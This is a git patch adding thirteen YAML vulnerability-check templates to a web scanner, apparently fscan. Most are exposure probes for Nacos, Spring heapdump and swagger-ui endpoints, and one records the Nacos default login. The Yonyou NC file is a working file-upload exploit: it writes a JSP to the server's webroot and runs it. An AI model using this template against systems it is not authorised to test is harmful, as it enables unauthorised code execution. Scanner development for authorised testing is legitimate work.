From 14c9847f88f501c3d8af4dbbe93a817179c62dcf Mon Sep 17 00:00:00 2001
From: shadow1ng <shadow1ng>
Date: Mon, 8 Feb 2021 15:13:56 +0800
Subject: [PATCH] =?UTF-8?q?=E5=A2=9E=E5=8A=A0=E6=8C=87=E7=BA=B9=E8=AF=86?=
 =?UTF-8?q?=E5=88=AB=E5=8A=9F=E8=83=BD,=E5=8F=AF=E8=AF=86=E5=88=AB?=
 =?UTF-8?q?=E5=B0=9D=E8=AF=95CMS=E3=80=81=E6=A1=86=E6=9E=B6,=E5=A6=82?=
 =?UTF-8?q?=E8=87=B4=E8=BF=9COA=E3=80=81=E9=80=9A=E8=BE=BEOA=E7=AD=89?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 WebScan/pocs/alibaba-nacos-api-unauth.yml     | 15 +++++++++++
 WebScan/pocs/alibaba-nacos.yml                | 13 ++++++++++
 .../pocs/spring-actuator-heapdump-file.yml    | 12 +++++++++
 WebScan/pocs/spring-heapdump-file.yml         | 12 +++++++++
 WebScan/pocs/swagger-ui-unauth-No1.yml        | 10 +++++++
 WebScan/pocs/swagger-ui-unauth-No2.yml        | 10 +++++++
 WebScan/pocs/swagger-ui-unauth-No3.yml        | 10 +++++++
 WebScan/pocs/swagger-ui-unauth-No4.yml        | 10 +++++++
 WebScan/pocs/swagger-ui-unauth-No5.yml        | 10 +++++++
 WebScan/pocs/swagger-ui-unauth-No6.yml        | 10 +++++++
 WebScan/pocs/swagger-ui-unauth-No7.yml        | 10 +++++++
 WebScan/pocs/swagger-ui-unauth-No8.yml        | 10 +++++++
 .../yonyou-nc6.5-arbitrary-file-upload.yml    | 26 +++++++++++++++++++
 13 files changed, 158 insertions(+)
 create mode 100644 WebScan/pocs/alibaba-nacos-api-unauth.yml
 create mode 100644 WebScan/pocs/alibaba-nacos.yml
 create mode 100644 WebScan/pocs/spring-actuator-heapdump-file.yml
 create mode 100644 WebScan/pocs/spring-heapdump-file.yml
 create mode 100644 WebScan/pocs/swagger-ui-unauth-No1.yml
 create mode 100644 WebScan/pocs/swagger-ui-unauth-No2.yml
 create mode 100644 WebScan/pocs/swagger-ui-unauth-No3.yml
 create mode 100644 WebScan/pocs/swagger-ui-unauth-No4.yml
 create mode 100644 WebScan/pocs/swagger-ui-unauth-No5.yml
 create mode 100644 WebScan/pocs/swagger-ui-unauth-No6.yml
 create mode 100644 WebScan/pocs/swagger-ui-unauth-No7.yml
 create mode 100644 WebScan/pocs/swagger-ui-unauth-No8.yml
 create mode 100644 WebScan/pocs/yonyou-nc6.5-arbitrary-file-upload.yml

diff --git a/WebScan/pocs/alibaba-nacos-api-unauth.yml b/WebScan/pocs/alibaba-nacos-api-unauth.yml
new file mode 100644
index 0000000..52512fb
--- /dev/null
+++ b/WebScan/pocs/alibaba-nacos-api-unauth.yml
@@ -0,0 +1,15 @@
+name: poc-yaml-alibaba-nacos-api-unauth
+rules:
+  - method: GET
+    path: /nacos/v1/auth/users?pageNo=1&pageSize=9
+    headers:
+      User-Agent: Nacos-Server
+    follow_redirects: true
+    expression: |
+      response.content_type.contains("application/json") && response.body.bcontains(bytes("totalCount")) && response.body.bcontains(bytes("pagesAvailable")) && response.body.bcontains(bytes("username")) && response.body.bcontains(bytes("password"))
+detail:
+  author: AgeloVito
+  info: alibaba-nacos-api-unauth
+  login: nacos/nacos
+  links:
+    - https://blog.csdn.net/caiqiiqi/article/details/112005424
diff --git a/WebScan/pocs/alibaba-nacos.yml b/WebScan/pocs/alibaba-nacos.yml
new file mode 100644
index 0000000..34a4407
--- /dev/null
+++ b/WebScan/pocs/alibaba-nacos.yml
@@ -0,0 +1,13 @@
+name: poc-yaml-alibaba-nacos
+rules:
+  - method: GET
+    path: /nacos/
+    follow_redirects: true
+    expression: |
+      response.body.bcontains(bytes("<title>Nacos</title>"))
+detail:
+  author: AgeloVito
+  info: alibaba-nacos
+  login: nacos/nacos
+  links:
+    - https://blog.csdn.net/caiqiiqi/article/details/112005424
diff --git a/WebScan/pocs/spring-actuator-heapdump-file.yml b/WebScan/pocs/spring-actuator-heapdump-file.yml
new file mode 100644
index 0000000..db481ae
--- /dev/null
+++ b/WebScan/pocs/spring-actuator-heapdump-file.yml
@@ -0,0 +1,12 @@
+name: poc-yaml-spring-actuator-heapdump-file
+rules:
+  - method: HEAD
+    path: /actuator/heapdump
+    follow_redirects: true
+    expression: |
+      response.status == 200 && response.content_type.contains("application/octet-stream")
+detail:
+  author: AgeloVito
+  info: spring-actuator-heapdump-file
+  links:
+    - https://www.cnblogs.com/wyb628/p/8567610.html
diff --git a/WebScan/pocs/spring-heapdump-file.yml b/WebScan/pocs/spring-heapdump-file.yml
new file mode 100644
index 0000000..148930d
--- /dev/null
+++ b/WebScan/pocs/spring-heapdump-file.yml
@@ -0,0 +1,12 @@
+name: poc-yaml-spring-heapdump-file
+rules:
+  - method: HEAD
+    path: /heapdump
+    follow_redirects: true
+    expression: |
+      response.status == 200 && response.content_type.contains("application/octet-stream")
+detail:
+  author: AgeloVito
+  info: spring-heapdump-file
+  links:
+    - https://www.cnblogs.com/wyb628/p/8567610.html
diff --git a/WebScan/pocs/swagger-ui-unauth-No1.yml b/WebScan/pocs/swagger-ui-unauth-No1.yml
new file mode 100644
index 0000000..591293f
--- /dev/null
+++ b/WebScan/pocs/swagger-ui-unauth-No1.yml
@@ -0,0 +1,10 @@
+name: poc-yaml-druid-monitor-unauth
+rules:
+  - method: GET
+    path: /swagger-ui.html
+    expression: |
+      response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js")
+detail:
+  author: AgeloVito
+  links:
+    - https://blog.csdn.net/u012206617/article/details/109107210
diff --git a/WebScan/pocs/swagger-ui-unauth-No2.yml b/WebScan/pocs/swagger-ui-unauth-No2.yml
new file mode 100644
index 0000000..f93e8f9
--- /dev/null
+++ b/WebScan/pocs/swagger-ui-unauth-No2.yml
@@ -0,0 +1,10 @@
+name: poc-yaml-druid-monitor-unauth
+rules:
+  - method: GET
+    path: /api/swagger-ui.html
+    expression: |
+      response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js")
+detail:
+  author: AgeloVito
+  links:
+    - https://blog.csdn.net/u012206617/article/details/109107210
diff --git a/WebScan/pocs/swagger-ui-unauth-No3.yml b/WebScan/pocs/swagger-ui-unauth-No3.yml
new file mode 100644
index 0000000..da56fc4
--- /dev/null
+++ b/WebScan/pocs/swagger-ui-unauth-No3.yml
@@ -0,0 +1,10 @@
+name: poc-yaml-druid-monitor-unauth
+rules:
+  - method: GET
+    path: /service/swagger-ui.html
+    expression: |
+      response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js")
+detail:
+  author: AgeloVito
+  links:
+    - https://blog.csdn.net/u012206617/article/details/109107210
diff --git a/WebScan/pocs/swagger-ui-unauth-No4.yml b/WebScan/pocs/swagger-ui-unauth-No4.yml
new file mode 100644
index 0000000..296ea00
--- /dev/null
+++ b/WebScan/pocs/swagger-ui-unauth-No4.yml
@@ -0,0 +1,10 @@
+name: poc-yaml-druid-monitor-unauth
+rules:
+  - method: GET
+    path: /web/swagger-ui.html
+    expression: |
+      response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js")
+detail:
+  author: AgeloVito
+  links:
+    - https://blog.csdn.net/u012206617/article/details/109107210
diff --git a/WebScan/pocs/swagger-ui-unauth-No5.yml b/WebScan/pocs/swagger-ui-unauth-No5.yml
new file mode 100644
index 0000000..9b58279
--- /dev/null
+++ b/WebScan/pocs/swagger-ui-unauth-No5.yml
@@ -0,0 +1,10 @@
+name: poc-yaml-druid-monitor-unauth
+rules:
+  - method: GET
+    path: /swagger/swagger-ui.html
+    expression: |
+      response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js")
+detail:
+  author: AgeloVito
+  links:
+    - https://blog.csdn.net/u012206617/article/details/109107210
diff --git a/WebScan/pocs/swagger-ui-unauth-No6.yml b/WebScan/pocs/swagger-ui-unauth-No6.yml
new file mode 100644
index 0000000..52d330b
--- /dev/null
+++ b/WebScan/pocs/swagger-ui-unauth-No6.yml
@@ -0,0 +1,10 @@
+name: poc-yaml-druid-monitor-unauth
+rules:
+  - method: GET
+    path: /actuator/swagger-ui.html
+    expression: |
+      response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js")
+detail:
+  author: AgeloVito
+  links:
+    - https://blog.csdn.net/u012206617/article/details/109107210
diff --git a/WebScan/pocs/swagger-ui-unauth-No7.yml b/WebScan/pocs/swagger-ui-unauth-No7.yml
new file mode 100644
index 0000000..ebaebf4
--- /dev/null
+++ b/WebScan/pocs/swagger-ui-unauth-No7.yml
@@ -0,0 +1,10 @@
+name: poc-yaml-druid-monitor-unauth
+rules:
+  - method: GET
+    path: /libs/swagger-ui.html
+    expression: |
+      response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js")
+detail:
+  author: AgeloVito
+  links:
+    - https://blog.csdn.net/u012206617/article/details/109107210
diff --git a/WebScan/pocs/swagger-ui-unauth-No8.yml b/WebScan/pocs/swagger-ui-unauth-No8.yml
new file mode 100644
index 0000000..323451b
--- /dev/null
+++ b/WebScan/pocs/swagger-ui-unauth-No8.yml
@@ -0,0 +1,10 @@
+name: poc-yaml-druid-monitor-unauth
+rules:
+  - method: GET
+    path: /template/swagger-ui.html
+    expression: |
+      response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js")
+detail:
+  author: AgeloVito
+  links:
+    - https://blog.csdn.net/u012206617/article/details/109107210
diff --git a/WebScan/pocs/yonyou-nc6.5-arbitrary-file-upload.yml b/WebScan/pocs/yonyou-nc6.5-arbitrary-file-upload.yml
new file mode 100644
index 0000000..8e6b75e
--- /dev/null
+++ b/WebScan/pocs/yonyou-nc6.5-arbitrary-file-upload.yml
@@ -0,0 +1,26 @@
+name: poc-yaml-yonyou-nc-arbitrary-file-upload
+set:
+  r1: randomInt(10000, 20000)
+  r2: randomInt(1000000000, 2000000000)
+  r3: b"\xac\xed\x00\x05sr\x00\x11java.util.HashMap\x05\a\xda\xc1\xc3\x16`\xd1\x03\x00\x02F\x00\nloadFactorI\x00\tthresholdxp?@\x00\x00\x00\x00\x00\fw\b\x00\x00\x00\x10\x00\x00\x00\x02t\x00\tFILE_NAMEt\x00\t"
+  r4: b".jspt\x00\x10TARGET_FILE_PATHt\x00\x10./webapps/nc_webx"
+rules:
+  - method: POST
+    path: /servlet/FileReceiveServlet
+    headers:
+      Content-Type: multipart/form-data;
+    body: >-
+      {{r3}}{{r1}}{{r4}}<%out.print("{{r2}}");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
+    expression: |
+      response.status == 200
+  - method: GET
+    path: '/{{r1}}.jsp'
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes(string(r2)))
+detail:
+  author: pa55w0rd(www.pa55w0rd.online/)
+  Affected Version: "YONYOU NC > 6.5"
+  links:
+    - https://blog.csdn.net/weixin_44578334/article/details/110917053
\ No newline at end of file